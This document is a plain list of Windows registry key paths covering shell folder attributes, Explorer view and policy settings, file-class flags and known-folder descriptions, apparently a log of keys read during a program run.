HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{daf95313-e44d-46af-be1b-cbacea2c3065}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{e345f35f-9397-435c-8f95-4e922c26259e}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{E345F35F-9397-435C-8F95-4E922C26259E}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{F3F5824C-AD58-4728-AF59-A1EBE3392799}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\PowerShell.exe\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5571c645-6060-11ed-bf52-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{5571c645-6060-11ed-bf52-806e6f6e6963}\Generation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
HKEY_CURRENT_USER\Software\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject
HKEY_CURRENT_USER\Software\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_CURRENT_USER\Software\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut
HKEY_CURRENT_USER\Software\Classes\Directory\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\AlwaysShowExt
HKEY_CURRENT_USER\Software\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Desktop
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParsingName
